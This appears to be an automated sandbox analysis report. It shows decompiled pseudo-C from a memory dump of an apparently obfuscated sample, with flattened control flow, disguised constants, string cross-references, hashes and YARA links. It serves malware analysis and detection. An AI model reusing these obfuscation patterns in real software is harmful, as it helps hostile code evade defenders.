0x00252a34
0x00252b15
0x00000000
0x00252b15
0x00252abf
0x00252ac5
0x00252acf
0x00252ad4
0x00000000
0x00252ad4

Strings

*, xrefs: 0025290B
4, xrefs: 00252756
XLq, xrefs: 00252700
e), xrefs: 00252768
6x, xrefs: 00252862
}:{, xrefs: 0025284A
., xrefs: 002528D0
*, xrefs: 0025274E
!, xrefs: 0025286A

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: .$4$6x$XLq$e)$}:{$!$*$*
API String ID: 0-323616845
Opcode ID: 7c0505cd4213b6a867f5c1983555ed2db1179862d2d4cd4fb58735f60bc364c7
Instruction ID: d07458f051f9e626a1b907a20533adb9289794429206eb5a68594cbc855d0314
Opcode Fuzzy Hash: 7c0505cd4213b6a867f5c1983555ed2db1179862d2d4cd4fb58735f60bc364c7
Instruction Fuzzy Hash: AAA161729183418FD368CF25C88940BFBE1FB85718F108A1DF4999A2A0D3B5CA59CF86

Uniqueness

Uniqueness Score: -1.00%

Function 002563C1, Relevance: 11.4, Strings: 9, Instructions: 194
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E002563C1() {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t166;
				signed int _t167;
				signed int _t168;
				void* _t173;
				void* _t191;
				intOrPtr _t196;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				intOrPtr _t202;
				intOrPtr* _t203;
				signed int _t204;
				signed int* _t205;

				_t205 =  &_v76;
				_v8 = 0x6b5f41;
				_t196 = 0;
				_t173 = 0x1e312b00;
				_v4 = 0;
				_v40 = 0xbf50;
				_v40 = _v40 + 0xffff4d7d;
				_v40 = _v40 ^ 0x1ff0eb0a;
				_v40 = _v40 ^ 0x1ff1e7c7;
				_v68 = 0xcba5;
				_v68 = _v68 + 0xffffed4d;
				_v68 = _v68 >> 9;
				_v68 = _v68 | 0x05a9bf19;
				_v68 = _v68 ^ 0x05a9faf6;
				_v52 = 0xab70;
				_v52 = _v52 + 0xffff3c3f;
				_v52 = _v52 ^ 0x3be47de3;
				_v52 = _v52 ^ 0xc41b8c81;
				_v20 = 0x4c56;
				_t27 =  &_v20; // 0x4c56
				_t197 = 0x53;
				_v20 =  *_t27 / _t197;
				_v20 = _v20 ^ 0x00006ba4;
				_v44 = 0x4e4f;
				_v44 = _v44 + 0xffff1389;
				_v44 = _v44 ^ 0x6e1bb2f9;
				_v44 = _v44 ^ 0x91e4a702;
				_v48 = 0x9b6d;
				_t198 = 0x15;
				_v48 = _v48 / _t198;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0x01d9d03e;
				_v16 = 0x7c52;
				_t199 = 0x3a;
				_v16 = _v16 * 0x14;
				_v16 = _v16 ^ 0x0009e5e2;
				_v64 = 0x462a;
				_v64 = _v64 ^ 0x0e1a4a8f;
				_v64 = _v64 >> 3;
				_v64 = _v64 >> 0xc;
				_v64 = _v64 ^ 0x000014fb;
				_v72 = 0x5cc4;
				_v72 = _v72 / _t199;
				_v72 = _v72 + 0x2f24;
				_v72 = _v72 + 0xd2bc;
				_v72 = _v72 ^ 0x000179b4;
				_v24 = 0x30ff;
				_t200 = 0x2a;
				_v24 = _v24 / _t200;
				_v24 = _v24 ^ 0x00007cf0;
				_v28 = 0x85cd;
				_v28 = _v28 ^ 0xf8a4d4b8;
				_v28 = _v28 ^ 0xf8a43927;
				_v76 = 0x1878;
				_v76 = _v76 ^ 0x7099aca3;
				_v76 = _v76 ^ 0x4acb853d;
				_v76 = _v76 + 0xffff4ab7;
				_v76 = _v76 ^ 0x3a511503;
				_v32 = 0x1800;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0x00002132;
				_v60 = 0xa25b;
				_v60 = _v60 * 0x67;
				_v60 = _v60 + 0x9ac4;
				_v60 = _v60 ^ 0x004180d5;
				_v36 = 0x47a4;
				_v36 = _v36 << 9;
				_v36 = _v36 ^ 0xcd228633;
				_v36 = _v36 ^ 0xcdadbf4b;
				_v12 = 0xe30d;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0x00e3661f;
				_t172 = _v12;
				_t204 = _v12;
				_t201 = _v12;
				_v56 = 0x2740;
				_v56 = _v56 ^ 0x239771de;
				_v56 = _v56 + 0xfffffe7e;
				_v56 = _v56 ^ 0x23985523;
				while(1) {
					L1:
					_t191 = 0x5c;
					while(1) {
						L2:
						do {
							L3:
							while(_t173 != 0x3fc1d7) {
								if(_t173 == 0x353ab5a) {
									_t202 =  *0x25ca2c; // 0x6d8300
									_t203 = _t202 + 0x230;
									while( *_t203 != _t191) {
										_t203 = _t203 + 2;
									}
									_t201 = _t203 + 2;
									_t173 = 0x6fcf9e2;
									goto L2;
								} else {
									if(_t173 == 0x6adc8a5) {
										_t167 = E0024F65F(_v40, _v44, _v48, _v16, _t201, _t172, _v64);
										_t205 =  &(_t205[5]);
										_t204 = _t167;
										_t166 = 0xd265085;
										_t173 =  !=  ? 0xd265085 : 0x3fc1d7;
										_t191 = 0x5c;
										continue;
									} else {
										if(_t173 == 0x6fcf9e2) {
											_t168 = E00242959(_t173, _v68, _v52, _v20, _v56);
											_t172 = _t168;
											_t205 =  &(_t205[4]);
											if(_t168 != 0) {
												_t173 = 0x6adc8a5;
												goto L1;
											}
										} else {
											if(_t173 == _t166) {
												E0025507B(_v72, _v24, _v28, _v76, _t204);
												_t205 =  &(_t205[3]);
												_t196 =  !=  ? 1 : _t196;
												_t173 = 0x17a504e8;
												while(1) {
													L1:
													_t191 = 0x5c;
													goto L2;
												}
											} else {
												if(_t173 == 0x17a504e8) {
													E00245FB2(_v32, _v60, _t204);
													_t173 = 0x3fc1d7;
													while(1) {
														L1:
														_t191 = 0x5c;
														L2:
														goto L3;
													}
												} else {
													if(_t173 != 0x1e312b00) {
														goto L21;
													} else {
														_t173 = 0x353ab5a;
														continue;
													}
												}
											}
										}
									}
								}
								goto L22;
							}
							E00245FB2(_v36, _v12, _t172);
							_t173 = 0x26181ebc;
							_t166 = 0xd265085;
							_t191 = 0x5c;
							L21:
						} while (_t173 != 0x26181ebc);
						L22:
						return _t196;
					}
				}
			}

0x002563c1
0x002563c4
0x002563d2
0x002563d4
0x002563d9
0x002563dd
0x002563e5
0x002563ed
0x002563f5
0x002563fd
0x00256405
0x0025640d
0x00256412
0x0025641a
0x00256422
0x0025642a
0x00256432
0x0025643a
0x00256442
0x0025644a
0x00256450
0x00256455
0x0025645b
0x00256463
0x0025646b
0x00256473
0x0025647b
0x00256483
0x0025648f
0x00256494
0x0025649a
0x0025649f
0x002564a7
0x002564b4
0x002564b7
0x002564bb
0x002564c3
0x002564cb
0x002564d3
0x002564d8
0x002564dd
0x002564e5
0x002564f5
0x002564f9
0x00256501
0x00256509
0x00256511
0x0025651d
0x00256520
0x00256524
0x0025652c
0x00256534
0x0025653c
0x00256544
0x0025654c
0x00256554
0x0025655c
0x00256564
0x0025656c
0x00256574
0x00256578
0x00256580
0x0025658d
0x00256591
0x00256599
0x002565a1
0x002565a9
0x002565ae
0x002565b6
0x002565be
0x002565c6
0x002565cb
0x002565d3
0x002565d7
0x002565db
0x002565df
0x002565e7
0x002565ef
0x002565f7
0x002565ff
0x002565ff
0x00256601
0x00256602
0x00256602
0x00256607
0x00000000
0x00256607
0x00256619
0x002566f6
0x002566fc
0x00256707
0x00256704
0x00256704
0x0025670c
0x0025670f
0x00000000
0x0025661f
0x00256625
0x002566d5
0x002566da
0x002566dd
0x002566e6
0x002566eb
0x002566f0
0x00000000
0x0025662b
0x00256631
0x002566a3
0x002566a8
0x002566aa
0x002566af
0x002566b5
0x00000000
0x002566b5
0x00256633
0x00256635
0x00256679
0x00256680
0x00256686
0x00256689
0x002565ff
0x002565ff
0x00256601
0x00000000
0x00256601
0x00256637
0x0025663d
0x0025665b
0x00256661
0x002565ff
0x002565ff
0x00256601
0x00256602
0x00000000
0x00256602
0x0025663f
0x00256645
0x00000000
0x0025664b
0x0025664b
0x00000000
0x0025664b
0x00256645
0x0025663d
0x00256635
0x00256631
0x00256625
0x00000000
0x00256619
0x00256722
0x0025672a
0x0025672f
0x00256734
0x00256735
0x00256735
0x00256741
0x0025674a
0x0025674a
0x00256602

Strings

R|, xrefs: 002564A7
@', xrefs: 002565DF
};, xrefs: 00256432
*F, xrefs: 002564C3
2!, xrefs: 00256578
VLA_k, xrefs: 0025644A
$/, xrefs: 002564F9
ON, xrefs: 00256463
A_k, xrefs: 002563C4

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $/$*F$2!$@'$A_k$ON$R|$VLA_k$};
API String ID: 0-175875280
Opcode ID: 4f652834dc948b86667515cae842944bfd3bfbca091d9f14d8239279e92a6f58
Instruction ID: d7e2a1eafe37eea982da661c1e5fb9b0c94090e1f39d8e8a47c17808e85f3aa2
Opcode Fuzzy Hash: 4f652834dc948b86667515cae842944bfd3bfbca091d9f14d8239279e92a6f58
Instruction Fuzzy Hash: FB8156711183819BD758CF24C49981BFBF1FBC4358F904A1CFA86466A0C7B58958CB87

Uniqueness

Uniqueness Score: -1.00%

Function 00252349, Relevance: 11.4, Strings: 9, Instructions: 190
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00252349(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t153;
				void* _t168;
				signed int _t172;
				char _t177;
				signed int _t178;
				void* _t181;
				char* _t186;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int* _t214;

				_push(_a16);
				_push(0x40);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t153);
				_v20 = 0x10;
				_t214 =  &(( &_v80)[6]);
				_v60 = 0xafa2;
				_v60 = _v60 ^ 0xad7cd4b0;
				_t178 = 0;
				_v60 = _v60 | 0x7a339cd1;
				_t181 = 0x15b39dc0;
				_v60 = _v60 ^ 0xff7ff485;
				_v64 = 0xe220;
				_v64 = _v64 >> 2;
				_v64 = _v64 | 0x618d1066;
				_v64 = _v64 ^ 0x618d4123;
				_v28 = 0xfe94;
				_t206 = 0x17;
				_v28 = _v28 / _t206;
				_v28 = _v28 ^ 0x000043c3;
				_v32 = 0x6fe3;
				_v32 = _v32 >> 1;
				_v32 = _v32 ^ 0x000078b7;
				_v36 = 0x3688;
				_t207 = 0x69;
				_v36 = _v36 * 0x5a;
				_v36 = _v36 ^ 0x00137d17;
				_v24 = 0x8157;
				_v24 = _v24 | 0x6dbfc3a0;
				_v24 = _v24 ^ 0x6dbfb45a;
				_v80 = 0xe945;
				_v80 = _v80 / _t207;
				_v80 = _v80 ^ 0xcc46d226;
				_t208 = 0x62;
				_v80 = _v80 / _t208;
				_v80 = _v80 ^ 0x0215c355;
				_v48 = 0x42ef;
				_v48 = _v48 + 0xffff3840;
				_v48 = _v48 << 4;
				_v48 = _v48 ^ 0xfff789fd;
				_v72 = 0xbf2b;
				_v72 = _v72 | 0xc326a1c7;
				_t209 = 0x4b;
				_v72 = _v72 / _t209;
				_v72 = _v72 | 0xd12f9700;
				_v72 = _v72 ^ 0xd3bfbe8a;
				_v52 = 0xfa61;
				_v52 = _v52 << 3;
				_v52 = _v52 + 0x5488;
				_v52 = _v52 ^ 0x00084626;
				_v56 = 0xb5dc;
				_v56 = _v56 | 0x6ca6e5ac;
				_v56 = _v56 * 0x5e;
				_v56 = _v56 ^ 0xe54e28a7;
				_v76 = 0xbf9d;
				_v76 = _v76 + 0xdb7b;
				_v76 = _v76 + 0xffff5618;
				_v76 = _v76 | 0xc179f847;
				_v76 = _v76 ^ 0xc1798349;
				_v40 = 0xd8e6;
				_v40 = _v40 + 0x2ceb;
				_v40 = _v40 + 0x406a;
				_v40 = _v40 ^ 0x0001168e;
				_v68 = 0x1b9c;
				_t210 = 0x7a;
				_v68 = _v68 * 0x38;
				_v68 = _v68 + 0xa456;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 ^ 0x00002836;
				_v44 = 0x7a08;
				_v44 = _v44 << 0xd;
				_v44 = _v44 / _t210;
				_v44 = _v44 ^ 0x00205e6a;
				while(_t181 != 0x12ef740) {
					if(_t181 == 0x13e246ff) {
						__eflags = _v16;
						_t186 =  &_v16;
						while(__eflags != 0) {
							_t177 =  *_t186;
							__eflags = _t177 - 0x30;
							if(_t177 < 0x30) {
								L11:
								__eflags = _t177 - 0x61;
								if(_t177 < 0x61) {
									L13:
									__eflags = _t177 - 0x41;
									if(_t177 < 0x41) {
										L15:
										 *_t186 = 0x58;
									} else {
										__eflags = _t177 - 0x5a;
										if(_t177 > 0x5a) {
											goto L15;
										}
									}
								} else {
									__eflags = _t177 - 0x7a;
									if(_t177 > 0x7a) {
										goto L13;
									}
								}
							} else {
								__eflags = _t177 - 0x39;
								if(_t177 > 0x39) {
									goto L11;
								}
							}
							_t186 = _t186 + 1;
							__eflags =  *_t186;
						}
						_t181 = 0x12ef740;
						continue;
					} else {
						if(_t181 == 0x15b39dc0) {
							_t181 = 0x3a71512f;
							continue;
						} else {
							if(_t181 != 0x3a71512f) {
								L19:
								__eflags = _t181 - 0x2b24b5a2;
								if(__eflags != 0) {
									continue;
								}
							} else {
								if(E0024602C(_v60,  &_v16,  &_v20, _v64) != 0) {
									_t181 = 0x13e246ff;
									continue;
								}
							}
						}
					}
					return _t178;
				}
				_push(0x25c030);
				_push(_v36);
				_t168 = E0025878F(_v28, _v32, __eflags);
				E002531E2(__eflags);
				_t143 =  &_v56; // 0x205e6a
				_t172 = E00256A65(_v48, __eflags,  &_v16, _v72, _a16, 0x40, _t168, _v52,  *_t143, _v76);
				__eflags = _t172;
				_t152 = _t172 > 0;
				__eflags = _t152;
				_t178 = 0 | _t152;
				E00252025(_v40, _t168, _v68, _v44);
				_t214 =  &(_t214[0xc]);
				_t181 = 0x2b24b5a2;
				goto L19;
			}

0x00252350
0x00252354
0x00252356
0x0025235a
0x0025235e
0x0025235f
0x00252360
0x00252365
0x0025236d
0x00252370
0x0025237a
0x00252382
0x00252384
0x0025238c
0x00252391
0x00252399
0x002523a1
0x002523a6
0x002523ae
0x002523b6
0x002523c4
0x002523c9
0x002523cf
0x002523d7
0x002523df
0x002523e3
0x002523eb
0x002523f8
0x002523fb
0x002523ff
0x00252407
0x0025240f
0x00252417
0x0025241f
0x0025242f
0x00252433
0x0025243f
0x00252444
0x0025244a
0x00252452
0x0025245a
0x00252462
0x00252467
0x0025246f
0x00252477
0x00252483
0x00252486
0x0025248a
0x00252492
0x0025249a
0x002524a2
0x002524a7
0x002524af
0x002524b7
0x002524bf
0x002524cc
0x002524d0
0x002524d8
0x002524e0
0x002524e8
0x002524f2
0x002524ff
0x0025250c
0x00252514
0x0025251c
0x00252524
0x0025252c
0x0025253b
0x0025253c
0x00252540
0x00252548
0x0025254d
0x00252555
0x0025255d
0x00252568
0x0025256c
0x00252574
0x0025257a
0x002525bb
0x002525c0
0x002525c4
0x002525c6
0x002525c8
0x002525ca
0x002525d0
0x002525d0
0x002525d2
0x002525d8
0x002525d8
0x002525da
0x002525e0
0x002525e0
0x002525dc
0x002525dc
0x002525de
0x00000000
0x00000000
0x002525de
0x002525d4
0x002525d4
0x002525d6
0x00000000
0x00000000
0x002525d6
0x002525cc
0x002525cc
0x002525ce
0x00000000
0x00000000
0x002525ce
0x002525e3
0x002525e4
0x002525e4
0x002525e9
0x00000000
0x0025257c
0x00252582
0x002525b4
0x00000000
0x00252584
0x0025258a
0x0025265e
0x0025265e
0x00252664
0x00000000
0x00000000
0x00252590
0x002525aa
0x002525b0
0x00000000
0x002525b0
0x002525aa
0x0025258a
0x00252582
0x00252673
0x00252673
0x002525ed
0x002525f2
0x002525fe
0x0025260d
0x0025261a
0x00252637
0x0025264c
0x0025264e
0x0025264e
0x0025264e
0x00252651
0x00252656
0x00252659
0x00000000

Strings

/Qq:, xrefs: 002525B4
o, xrefs: 002523D7
, xrefs: 00252399
j^ , xrefs: 0025261A
/Qq:, xrefs: 00252584
j@, xrefs: 0025251C
E, xrefs: 0025241F
6(, xrefs: 0025254D
j^ , xrefs: 00252562

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $/Qq:$/Qq:$6($E$j@$j^ $j^ $o
API String ID: 0-892457230
Opcode ID: 1f9e741cfa107f421632e443d30f0f84888e96591f8997509bec4f1633212b5f
Instruction ID: 5975a23788f36fa8bca7a602fdacb375b6d185c091fa7317bfb9e766790e5403
Opcode Fuzzy Hash: 1f9e741cfa107f421632e443d30f0f84888e96591f8997509bec4f1633212b5f
Instruction Fuzzy Hash: 0181A771519341DFD768CF25C98A51BBBE1BBC1B18F80480DF5819A2A0D7B5CA1ACF4B

Uniqueness

Uniqueness Score: -1.00%

Function 10002D70, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108commemoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding="), ref: 10002D7F
CoCreateInstance.OLE32(1000D4B0,00000000,00000001,1000D4C0,?), ref: 10002DB0
PropVariantClear.OLE32(?), ref: 10002E75
SysFreeString.OLEAUT32(00000000), ref: 10002E7E
SysFreeString.OLEAUT32(00000000), ref: 10002E97

Strings

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding=", xrefs: 10002D77

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$AllocClearCreateInstancePropVariant
String ID: <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding="
API String ID: 2501108336-1018649646
Opcode ID: 96621fcdecdd77bcd87e053180f01b167328e1e2a90fb6c4d0d6cfded311a5a7
Instruction ID: 0b0c17a62beb8f9cda8331f18031103c31f3880d59fc8f905040adcea8ba8702
Opcode Fuzzy Hash: 96621fcdecdd77bcd87e053180f01b167328e1e2a90fb6c4d0d6cfded311a5a7
Instruction Fuzzy Hash: D5417071D0022AAFDB00DBA4CC48ADEB7B8EF48754F114199F905EB254DB71DE01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00259B45, Relevance: 10.3, Strings: 8, Instructions: 294
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00259B45(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				signed int* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				unsigned int _v112;
				signed int _v116;
				void* _t241;
				intOrPtr _t259;
				void* _t260;
				intOrPtr _t268;
				intOrPtr _t269;
				intOrPtr _t270;
				intOrPtr _t274;
				intOrPtr* _t281;
				signed int _t283;
				void* _t315;
				intOrPtr* _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int* _t322;
				signed int* _t325;
				void* _t327;

				_t281 = _a8;
				_push(_t281);
				_push(_a4);
				_t316 = __ecx;
				_push(__edx);
				_push(__ecx);
				E0024602B(_t241);
				_v76 = 0xd801;
				_t325 =  &(( &_v116)[4]);
				_v76 = _v76 >> 6;
				_t315 = 0;
				_t283 = 0xafaf7d2;
				_t317 = 6;
				_v76 = _v76 * 0x2a;
				_v76 = _v76 ^ 0x0000b202;
				_v80 = 0xa1a8;
				_v80 = _v80 | 0xe917477a;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0xa45f8c0e;
				_v84 = 0x144b;
				_v84 = _v84 + 0xffffbc75;
				_v84 = _v84 * 0x6d;
				_v84 = _v84 ^ 0xffeb93ca;
				_v52 = 0x2e4b;
				_v52 = _v52 | 0x557249c0;
				_v52 = _v52 ^ 0x346b51fe;
				_v52 = _v52 ^ 0x611902e1;
				_v56 = 0xfad0;
				_v56 = _v56 + 0xffff1342;
				_v56 = _v56 ^ 0x8fd20197;
				_v56 = _v56 ^ 0x8fd21d65;
				_v96 = 0x8e39;
				_v96 = _v96 + 0xd833;
				_v96 = _v96 + 0xffffc0bd;
				_v96 = _v96 >> 0xa;
				_v96 = _v96 ^ 0x000036ba;
				_v12 = 0xb209;
				_v12 = _v12 ^ 0xf6f529e5;
				_v12 = _v12 ^ 0xf6f5ec43;
				_v64 = 0xc247;
				_v64 = _v64 + 0xffff53d4;
				_v64 = _v64 << 9;
				_v64 = _v64 ^ 0x002c2f20;
				_v100 = 0x41c0;
				_v100 = _v100 | 0x528356d8;
				_v100 = _v100 ^ 0x6d95e5a5;
				_v100 = _v100 >> 1;
				_v100 = _v100 ^ 0x1f8b2fe0;
				_v16 = 0x904b;
				_v16 = _v16 + 0x3d62;
				_v16 = _v16 ^ 0x0000a85c;
				_v68 = 0xf7e0;
				_v68 = _v68 | 0xcc3d0ce1;
				_v68 = _v68 >> 7;
				_v68 = _v68 ^ 0x01982b66;
				_v72 = 0x69a0;
				_v72 = _v72 / _t317;
				_v72 = _v72 ^ 0xd5ac5c66;
				_v72 = _v72 ^ 0xd5ac219b;
				_v20 = 0x9739;
				_v20 = _v20 << 2;
				_v20 = _v20 ^ 0x000260e8;
				_v24 = 0xc564;
				_t318 = 0x2c;
				_v24 = _v24 / _t318;
				_v24 = _v24 ^ 0x00005d30;
				_v88 = 0xe78a;
				_v88 = _v88 >> 1;
				_v88 = _v88 << 4;
				_v88 = _v88 ^ 0x00070feb;
				_v28 = 0x7421;
				_v28 = _v28 + 0xffff545c;
				_v28 = _v28 ^ 0xfffff127;
				_v32 = 0x3ef3;
				_t319 = 0x23;
				_v32 = _v32 * 0x1e;
				_v32 = _v32 ^ 0x00070388;
				_v36 = 0x1f6a;
				_v36 = _v36 << 0xa;
				_v36 = _v36 ^ 0x007d8833;
				_v104 = 0xc791;
				_v104 = _v104 + 0xffffa2ac;
				_v104 = _v104 * 0x2b;
				_v104 = _v104 + 0x587f;
				_v104 = _v104 ^ 0x00127594;
				_v40 = 0xa663;
				_v40 = _v40 + 0xffffc5d4;
				_v40 = _v40 ^ 0x00001ad7;
				_v44 = 0x2b76;
				_v44 = _v44 << 0xc;
				_v44 = _v44 ^ 0x02b774b0;
				_v92 = 0xa27;
				_v92 = _v92 / _t319;
				_v92 = _v92 + 0xffff3569;
				_v92 = _v92 ^ 0xffff2eae;
				_v108 = 0xf211;
				_t320 = 0x54;
				_v108 = _v108 / _t320;
				_v108 = _v108 >> 0xb;
				_v108 = _v108 | 0x89ac3126;
				_v108 = _v108 ^ 0x89ac4c52;
				_v112 = 0x8d71;
				_v112 = _v112 >> 0xa;
				_v112 = _v112 | 0xeb52e524;
				_v112 = _v112 >> 4;
				_v112 = _v112 ^ 0x0eb57242;
				_v48 = 0x270e;
				_v48 = _v48 | 0xda2d7f86;
				_v48 = _v48 ^ 0xda2d74b2;
				_v116 = 0xd303;
				_v116 = _v116 ^ 0x52d81e99;
				_t321 = 0x2e;
				_t322 = _v4;
				_v116 = _v116 / _t321;
				_v116 = _v116 * 0x47;
				_v116 = _v116 ^ 0x7fdf43a3;
				while(1) {
					_t258 = _v60;
					while(1) {
						L2:
						_t327 = _t283 - 0x1af8f879;
						if(_t327 <= 0) {
							break;
						}
						if(_t283 == 0x20f5637b) {
							_t259 =  *0x25ca20; // 0x0
							_t260 = E00251B49( &_v8, _v12, _t283,  *((intOrPtr*)(_t259 + 0x2c)), _t283, _v64, _v100);
							_t325 =  &(_t325[5]);
							if(_t260 == 0) {
								_t283 = 0x33905d8a;
								L26:
								if(_t283 == 0xc271ab7) {
									L30:
									return _t315;
								}
								while(1) {
									_t258 = _v60;
									goto L2;
								}
							}
							_t283 = 0x1af8f879;
							while(1) {
								_t258 = _v60;
								goto L2;
							}
						}
						if(_t283 == 0x28aacb6e) {
							if( *((intOrPtr*)(_t281 + 4)) < 0x74) {
								goto L30;
							}
							_t283 = 0x351bb9b3;
							continue;
						}
						if(_t283 == 0x33905d8a) {
							if(_t315 == 0) {
								E0024F536(_v52, _v56, _v96,  *_t316);
							}
							goto L30;
						}
						if(_t283 != 0x351bb9b3) {
							goto L26;
						}
						_t283 = 0xa3bf63c;
					}
					if(_t327 == 0) {
						E00252674(_v16, _v68, _t322,  *_t316, _v72, _v20, _t258);
						_t325 =  &(_t325[5]);
						_t283 = 0xc483d1b;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 == 0xa3bf63c) {
						 *((intOrPtr*)(_t316 + 4)) =  *((intOrPtr*)(_t281 + 4)) - 0x74;
						_push(_t283);
						_push(_t283);
						_t268 = E00248736( *((intOrPtr*)(_t316 + 4)));
						 *_t316 = _t268;
						if(_t268 == 0) {
							goto L30;
						}
						_t269 =  *_t281;
						_t283 = 0x20f5637b;
						_v4 = _t269;
						_t258 = _t269 + 0x74;
						_v60 = _t269 + 0x74;
						_t322 =  &_v116;
						goto L2;
					}
					if(_t283 == 0xafaf7d2) {
						_t283 = 0x28aacb6e;
						goto L2;
					}
					if(_t283 == 0xc483d1b) {
						_t270 =  *0x25ca20; // 0x0
						E002455D8(_v24, _v8, _t283, _t316 + 4, _v88,  *_t316, _v28, _v32, _v36,  *((intOrPtr*)(_t270 + 0x10)), _v104);
						_t325 =  &(_t325[0xa]);
						asm("sbb ecx, ecx");
						_t283 = (_t283 & 0xfff990e9) + 0x199ab82a;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 == 0x19944913) {
						_t274 =  *0x25ca20; // 0x0
						_push(_t283);
						_push(_t283);
						E0025838C(_v40, _v44, _v92, _v108, _t283, _v4, _v8,  *((intOrPtr*)(_t274 + 0x24)));
						_t325 =  &(_t325[8]);
						_t315 =  !=  ? 1 : _t315;
						_t283 = 0x199ab82a;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 != 0x199ab82a) {
						goto L26;
					}
					_push(_t283);
					_push(_t283);
					E00245F43(_t283, _v8);
					_t283 = 0x33905d8a;
				}
			}

0x00259b49
0x00259b53
0x00259b54
0x00259b5b
0x00259b5d
0x00259b5e
0x00259b5f
0x00259b64
0x00259b6c
0x00259b6f
0x00259b7b
0x00259b7d
0x00259b84
0x00259b87
0x00259b8b
0x00259b93
0x00259b9b
0x00259ba3
0x00259ba8
0x00259bb0
0x00259bb8
0x00259bc5
0x00259bc9
0x00259bd1
0x00259bd9
0x00259be1
0x00259be9
0x00259bf1
0x00259bf9
0x00259c01
0x00259c09
0x00259c11
0x00259c19
0x00259c21
0x00259c29
0x00259c2e
0x00259c36
0x00259c3e
0x00259c46
0x00259c4e
0x00259c56
0x00259c5e
0x00259c63
0x00259c6b
0x00259c73
0x00259c7b
0x00259c83
0x00259c87
0x00259c8f
0x00259c97
0x00259c9f
0x00259ca7
0x00259caf
0x00259cb7
0x00259cbc
0x00259cc4
0x00259cd4
0x00259cd8
0x00259ce0
0x00259ce8
0x00259cf0
0x00259cf5
0x00259cfd
0x00259d09
0x00259d0c
0x00259d10
0x00259d18
0x00259d20
0x00259d26
0x00259d2b
0x00259d33
0x00259d3b
0x00259d43
0x00259d4b
0x00259d5a
0x00259d5d
0x00259d61
0x00259d69
0x00259d71
0x00259d76
0x00259d7e
0x00259d86
0x00259d93
0x00259d97
0x00259d9f
0x00259da7
0x00259daf
0x00259db7
0x00259dbf
0x00259dc7
0x00259dcc
0x00259dd4
0x00259de4
0x00259de8
0x00259df0
0x00259df8
0x00259e04
0x00259e09
0x00259e0f
0x00259e14
0x00259e1c
0x00259e24
0x00259e2c
0x00259e31
0x00259e39
0x00259e3e
0x00259e46
0x00259e4e
0x00259e56
0x00259e5e
0x00259e66
0x00259e72
